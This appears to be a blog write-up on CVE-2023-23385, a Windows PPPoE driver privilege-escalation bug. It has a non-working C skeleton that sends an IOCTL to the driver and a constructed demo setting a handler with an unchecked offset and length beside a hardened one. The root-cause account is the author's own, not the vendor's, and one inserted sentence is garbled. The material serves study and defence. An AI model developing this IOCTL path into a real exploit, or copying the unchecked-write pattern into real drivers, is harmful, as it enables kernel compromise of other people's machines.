In this post, we will dive deep into the details of a significant Point-to-Point Protocol over Ethernet (PPPoE) vulnerability in Windows operating systems, namely CVE-2023-23385. We will take a closer look at how this vulnerability may be exploited, provide code snippets to demonstrate the issue, and offer references for further investigation.
The Vulnerability - An Overview
CVE-2023-23385 is an Elevation of Privilege (EoP) vulnerability in the Windows PPPoE implementation. PPPoE is a network protocol widely used for DSL broadband connections; it encapsulates PPP frames inside Ethernet frames. The affected component is "raspppoe.sys", the kernel-mode RAS PPPoE miniport/call-manager driver that handles PPPoE connections on Windows. Because the driver runs in kernel mode, a memory-safety bug reachable from user mode is an escalation path, not merely a crash.
The vulnerability hinges on insufficient input validation in the IOCTL interface exposed by raspppoe.sys. The attack vector is local: a low-privileged user, or an attacker who already has a foothold on the target system, can trigger the bug to elevate to SYSTEM, the highest privilege level on a Windows machine. It is not remotely exploitable on its own and is typically chained after an initial compromise.
Exploit Details
To exploit CVE-2023-23385, an attacker sends the raspppoe.sys driver an IOCTL request carrying malformed input that the driver fails to validate, producing an out-of-bounds write in kernel memory. A kernel write primitive by itself is not code execution: the attacker still has to turn the corruption into arbitrary code running in kernel context, which is what ultimately yields SYSTEM-level control of the machine. Microsoft's advisory does not publish root-cause details, so the IOCTL interface and the out-of-bounds write described here reflect this post's analysis rather than a vendor write-up.
Here is a code snippet illustrating the basics of reaching the vulnerable code path from user mode. The device path (\\.\RasPppoeAdapter) and the control code are stand-ins that a reader would have to replace with values recovered from the driver, and the input buffer is left empty:
#include <windows.h>
#include <winioctl.h>   /* CTL_CODE, FILE_DEVICE_UNKNOWN, METHOD_NEITHER */
#include <tchar.h>      /* TCHAR, _T */
#include <stdio.h>

/* Placeholder control code. With METHOD_NEITHER the driver receives the raw
 * user-mode buffer pointers and must validate them itself. */
#define IOCTL_TRIGGER_VULN CTL_CODE(FILE_DEVICE_UNKNOWN, 0x804, METHOD_NEITHER, FILE_ANY_ACCESS)

int main(void) {
    printf("[+] CVE-2023-23385 - Windows PPPoE Elevation of Privilege POC\n\n");

    /* Placeholder device path; the real object name must be recovered from the driver. */
    TCHAR szDeviceName[] = _T("\\\\.\\RasPppoeAdapter");

    /* Synchronous handle (flags = 0): FILE_FLAG_OVERLAPPED would require a valid
     * OVERLAPPED structure in the DeviceIoControl call below. */
    HANDLE hDevice = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE,
                                FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
                                OPEN_EXISTING, 0, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open RasPppoeAdapter device (error %lu)\n", GetLastError());
        return 1;
    }
    printf("[+] Successfully opened RasPppoeAdapter device\n");

    /* Attacker-controlled input buffer; a real PoC fills this with the malformed request. */
    BYTE inBuffer[0x100] = { 0 };
    DWORD bytesReturned = 0;
    if (!DeviceIoControl(hDevice, IOCTL_TRIGGER_VULN, inBuffer, sizeof(inBuffer),
                         NULL, 0, &bytesReturned, NULL)) {
        printf("[-] DeviceIoControl failed (error %lu)\n", GetLastError());
    } else {
        printf("[+] IOCTL submitted to the driver\n");
    }

    CloseHandle(hDevice);
    return 0;
}
This code demonstrates only the IOCTL delivery path: open a handle to the device object and submit a control code with an attacker-controlled input buffer. It is a skeleton, not a working exploit. An actual exploit would have to supply the specific malformed input that triggers the out-of-bounds write and then use more advanced techniques to convert that primitive into privilege escalation and arbitrary code execution.
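The bug class the Exploit Details section describes, an IOCTL handler that trusts a caller-supplied offset and length and writes past a fixed-size kernel buffer, as an added, constructed illustration: this is not raspppoe.sys code (the real driver's request format and root cause are not public), and the request layout (`offset`, `length`, payload), the buffer sizes, the status codes and the handler names are hypothetical. The vulnerable handler sits beside a hardened one whose destination check is written so that `offset + length` cannot wrap in 32-bit arithmetic; guard bytes around the "kernel" buffer make a short overflow observable while keeping the demo write inside one allocation.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed illustration (not raspppoe.sys code) of an IOCTL handler that
 * trusts a caller-supplied offset and length when writing into a fixed-size
 * kernel-side buffer. Request layout, sizes and names are hypothetical. */

#define KBUF_SIZE  64u
#define GUARD_SIZE 16u
#define GUARD_BYTE 0xAA

enum { STATUS_SUCCESS = 0, STATUS_INVALID_PARAMETER = 1, STATUS_BUFFER_TOO_SMALL = 2 };

/* Hypothetical request: 8-byte header followed by `length` payload bytes. */
typedef struct {
    uint32_t offset;   /* where in the kernel buffer to write */
    uint32_t length;   /* number of payload bytes that follow the header */
} ioctl_hdr_t;

/* The "kernel" buffer with guard bytes on both sides, so a short overflow
 * is observable and stays inside one allocation for this demo. */
typedef struct {
    uint8_t guard_lo[GUARD_SIZE];
    uint8_t kbuf[KBUF_SIZE];
    uint8_t guard_hi[GUARD_SIZE];
} arena_t;

static void arena_init(arena_t *a) {
    memset(a->guard_lo, GUARD_BYTE, GUARD_SIZE);
    memset(a->kbuf, 0, KBUF_SIZE);
    memset(a->guard_hi, GUARD_BYTE, GUARD_SIZE);
}

static int guards_intact(const arena_t *a) {
    for (unsigned i = 0; i < GUARD_SIZE; i++)
        if (a->guard_lo[i] != GUARD_BYTE || a->guard_hi[i] != GUARD_BYTE)
            return 0;
    return 1;
}

/* Vulnerable: checks that the payload is present in the input buffer, but
 * never checks that offset + length fits in kbuf (the bug class at issue). */
static int handle_ioctl_vulnerable(arena_t *a, const uint8_t *in, size_t in_len) {
    ioctl_hdr_t h;
    if (in_len < sizeof h) return STATUS_BUFFER_TOO_SMALL;
    memcpy(&h, in, sizeof h);
    if (h.length > in_len - sizeof h) return STATUS_BUFFER_TOO_SMALL;
    memcpy(a->kbuf + h.offset, in + sizeof h, h.length);  /* out-of-bounds write */
    return STATUS_SUCCESS;
}

/* Hardened: same input check, plus a destination check written so that
 * offset + length cannot wrap around in 32-bit arithmetic. */
static int handle_ioctl_hardened(arena_t *a, const uint8_t *in, size_t in_len) {
    ioctl_hdr_t h;
    if (in_len < sizeof h) return STATUS_BUFFER_TOO_SMALL;
    memcpy(&h, in, sizeof h);
    if (h.length > in_len - sizeof h) return STATUS_BUFFER_TOO_SMALL;
    if (h.offset > KBUF_SIZE || h.length > KBUF_SIZE - h.offset)
        return STATUS_INVALID_PARAMETER;
    memcpy(a->kbuf + h.offset, in + sizeof h, h.length);
    return STATUS_SUCCESS;
}

/* Builds a request as an attacker would: header plus `length` bytes of 0x41.
 * Returns the total request size, or 0 if it does not fit in `out`. */
static size_t build_request(uint8_t *out, size_t out_cap, uint32_t offset, uint32_t length) {
    ioctl_hdr_t h = { offset, length };
    if (out_cap < sizeof h || length > out_cap - sizeof h) return 0;
    memcpy(out, &h, sizeof h);
    memset(out + sizeof h, 0x41, length);
    return sizeof h + length;
}

/* Runs one crafted request through the chosen handler on a fresh arena.
 * Returns the handler's status; *guard_ok reports whether the guards survived. */
static int run_case(int hardened, uint32_t offset, uint32_t length, int *guard_ok) {
    arena_t a;
    uint8_t req[sizeof(ioctl_hdr_t) + 64];
    int st = STATUS_BUFFER_TOO_SMALL;
    arena_init(&a);
    size_t n = build_request(req, sizeof req, offset, length);
    if (n != 0)
        st = hardened ? handle_ioctl_hardened(&a, req, n)
                      : handle_ioctl_vulnerable(&a, req, n);
    *guard_ok = guards_intact(&a);
    return st;
}

/* Single-value wrappers around run_case: the status, or whether guards survived. */
static int case_status(int hardened, uint32_t offset, uint32_t length) {
    int ok; return run_case(hardened, offset, length, &ok);
}
static int case_guards_ok(int hardened, uint32_t offset, uint32_t length) {
    int ok; (void)run_case(hardened, offset, length, &ok); return ok;
}

int main(void) {
    /* 8 bytes at offset 60 of a 64-byte buffer: 4 bytes spill past the end. */
    printf("vulnerable: status=%d guards_intact=%d\n", case_status(0, 60, 8), case_guards_ok(0, 60, 8));
    printf("hardened:   status=%d guards_intact=%d\n", case_status(1, 60, 8), case_guards_ok(1, 60, 8));
    /* offset + length wraps to 8 in uint32; the wrap-safe check still rejects it. */
    printf("hardened (wrap attempt): status=%d\n", case_status(1, 0xFFFFFFF8u, 16));
    return 0;
}
```

The vulnerable path returns success while the high guard is overwritten, which is the silent corruption an attacker builds on; the hardened path rejects the same request, and also the wrap attempt that a naive `offset + length <= KBUF_SIZE` check in 32-bit arithmetic would let through. In a real METHOD_NEITHER handler the user-mode pointers themselves must also be probed before any of this, since the I/O manager does not copy or validate them for the driver.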
References
For more information on this vulnerability and potential mitigations, please consult the following references:
1. Official CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23385
2. Microsoft Security Advisory: https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2023-23385
3. Carnegie Mellon Software Engineering Institute - CERT Coordination Center: https://kb.cert.org/vuls/id/605645
Conclusion
CVE-2023-23385 is an Elevation of Privilege vulnerability in the Windows PPPoE implementation (raspppoe.sys) that can give a local attacker complete control over a targeted system. Apply the Microsoft security update that addresses it, released on the March 2023 Patch Tuesday noted in the timeline below, and keep systems current with subsequent security updates.
Timeline
Published on: 03/14/2023 17:15:00 UTC
Last modified on: 03/23/2023 16:59:00 UTC